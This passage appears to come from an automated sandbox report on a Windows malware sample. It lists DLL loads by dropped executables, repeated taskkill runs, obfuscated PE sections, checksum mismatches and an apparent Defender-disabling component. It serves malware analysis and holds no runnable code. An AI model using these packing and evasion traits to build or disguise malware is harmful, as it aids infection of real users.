Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32
Source: C:\Program Files\Mozilla Firefox\firefox.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\compatibility.ini
Source: Window Recorder Window detected: More than 3 window changes detected
Source: file.exe Static file information: File size 2891264 > 1048576
Source: file.exe Static PE information: Raw size of muoxnbrn is bigger than: 0x100000 < 0x298600
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: BF3BS0M5707K28RGW9.exe, 00000006.00000003.2417253737.0000000005010000.00000004.00001000.00020000.00000000.sdmp, BF3BS0M5707K28RGW9.exe, 00000006.00000002.2550539027.0000000000A32000.00000040.00000001.01000000.0000000B.sdmp

Data Obfuscation

Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Unpacked PE file: 3.2.OLR88CERN7VQFRQ38J.exe.130000.0.unpack :EW;.rsrc:W;.idata :W; :EW;toioyzgt:EW;nacjdqiu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;toioyzgt:EW;nacjdqiu:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Unpacked PE file: 4.2.ENORVNMU067PBMHUGECCERYC06W3ZY.exe.4d0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;iadgvtjq:EW;xuvqjoqm:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;iadgvtjq:EW;xuvqjoqm:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Unpacked PE file: 6.2.BF3BS0M5707K28RGW9.exe.a30000.0.unpack :EW;.rsrc:W;.idata :W;zsdjwali:EW;xurnmcxc:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Unpacked PE file: 9.2.aae25c676b.exe.e30000.0.unpack :EW;.rsrc :W;.idata :W;muoxnbrn:EW;ckkqhetw:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;muoxnbrn:EW;ckkqhetw:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Unpacked PE file: 10.2.7d61336cf8.exe.a20000.0.unpack :EW;.rsrc :W;.idata :W; :EW;iadgvtjq:EW;xuvqjoqm:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;iadgvtjq:EW;xuvqjoqm:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Unpacked PE file: 21.2.aae25c676b.exe.e30000.0.unpack :EW;.rsrc :W;.idata :W;muoxnbrn:EW;ckkqhetw:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;muoxnbrn:EW;ckkqhetw:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 30.2.skotes.exe.130000.0.unpack :EW;.rsrc:W;.idata :W; :EW;toioyzgt:EW;nacjdqiu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;toioyzgt:EW;nacjdqiu:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Unpacked PE file: 32.2.7d61336cf8.exe.a20000.0.unpack :EW;.rsrc :W;.idata :W; :EW;iadgvtjq:EW;xuvqjoqm:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;iadgvtjq:EW;xuvqjoqm:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F642DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 12_2_00F642DE
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: random[1].exe.5.dr Static PE information: real checksum: 0x2c94dc should be: 0x2c25f9
Source: num[1].exe.5.dr Static PE information: real checksum: 0x0 should be: 0x52a2a
Source: num.exe.5.dr Static PE information: real checksum: 0x0 should be: 0x52a2a
Source: 7d61336cf8.exe.5.dr Static PE information: real checksum: 0x1ce0d1 should be: 0x1c4e20
Source: OLR88CERN7VQFRQ38J.exe.0.dr Static PE information: real checksum: 0x1dbe5c should be: 0x1d8df2
Source: aae25c676b.exe.5.dr Static PE information: real checksum: 0x2c94dc should be: 0x2c25f9
Source: ENORVNMU067PBMHUGECCERYC06W3ZY.exe.0.dr Static PE information: real checksum: 0x1ce0d1 should be: 0x1c4e20
Source: file.exe Static PE information: real checksum: 0x2c94dc should be: 0x2c25f9
Source: random[1].exe0.5.dr Static PE information: real checksum: 0x1ce0d1 should be: 0x1c4e20
Source: skotes.exe.3.dr Static PE information: real checksum: 0x1dbe5c should be: 0x1d8df2
Source: BF3BS0M5707K28RGW9.exe.0.dr Static PE information: real checksum: 0x2b72de should be: 0x2b0668
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name: muoxnbrn
Source: file.exe Static PE information: section name: ckkqhetw
Source: file.exe Static PE information: section name: .taggant
Source: OLR88CERN7VQFRQ38J.exe.0.dr Static PE information: section name:
Source: OLR88CERN7VQFRQ38J.exe.0.dr Static PE information: section name: .idata
Source: OLR88CERN7VQFRQ38J.exe.0.dr Static PE information: section name:
Source: OLR88CERN7VQFRQ38J.exe.0.dr Static PE information: section name: toioyzgt
Source: OLR88CERN7VQFRQ38J.exe.0.dr Static PE information: section name: nacjdqiu
Source: OLR88CERN7VQFRQ38J.exe.0.dr Static PE information: section name: .taggant
Source: ENORVNMU067PBMHUGECCERYC06W3ZY.exe.0.dr Static PE information: section name:
Source: ENORVNMU067PBMHUGECCERYC06W3ZY.exe.0.dr Static PE information: section name: .rsrc
Source: ENORVNMU067PBMHUGECCERYC06W3ZY.exe.0.dr Static PE information: section name: .idata
Source: ENORVNMU067PBMHUGECCERYC06W3ZY.exe.0.dr Static PE information: section name:
Source: ENORVNMU067PBMHUGECCERYC06W3ZY.exe.0.dr Static PE information: section name: iadgvtjq
Source: ENORVNMU067PBMHUGECCERYC06W3ZY.exe.0.dr Static PE information: section name: xuvqjoqm
Source: ENORVNMU067PBMHUGECCERYC06W3ZY.exe.0.dr Static PE information: section name: .taggant
Source: BF3BS0M5707K28RGW9.exe.0.dr Static PE information: section name:
Source: BF3BS0M5707K28RGW9.exe.0.dr Static PE information: section name: .idata
Source: BF3BS0M5707K28RGW9.exe.0.dr Static PE information: section name: zsdjwali
Source: BF3BS0M5707K28RGW9.exe.0.dr Static PE information: section name: xurnmcxc
Source: BF3BS0M5707K28RGW9.exe.0.dr Static PE information: section name: .taggant
Source: skotes.exe.3.dr Static PE information: section name:
Source: skotes.exe.3.dr Static PE information: section name: .idata
Source: skotes.exe.3.dr Static PE information: section name:
Source: skotes.exe.3.dr Static PE information: section name: toioyzgt
Source: skotes.exe.3.dr Static PE information: section name: nacjdqiu
Source: skotes.exe.3.dr Static PE information: section name: .taggant
Source: random[1].exe.5.dr Static PE information: section name:
Source: random[1].exe.5.dr Static PE information: section name: .rsrc
Source: random[1].exe.5.dr Static PE information: section name: .idata
Source: random[1].exe.5.dr Static PE information: section name: muoxnbrn
Source: random[1].exe.5.dr Static PE information: section name: ckkqhetw
Source: random[1].exe.5.dr Static PE information: section name: .taggant
Source: aae25c676b.exe.5.dr Static PE information: section name:
Source: aae25c676b.exe.5.dr Static PE information: section name: .rsrc
Source: aae25c676b.exe.5.dr Static PE information: section name: .idata
Source: aae25c676b.exe.5.dr Static PE information: section name: muoxnbrn
Source: aae25c676b.exe.5.dr Static PE information: section name: ckkqhetw
Source: aae25c676b.exe.5.dr Static PE information: section name: .taggant
Source: random[1].exe0.5.dr Static PE information: section name:
Source: random[1].exe0.5.dr Static PE information: section name: .rsrc
Source: random[1].exe0.5.dr Static PE information: section name: .idata
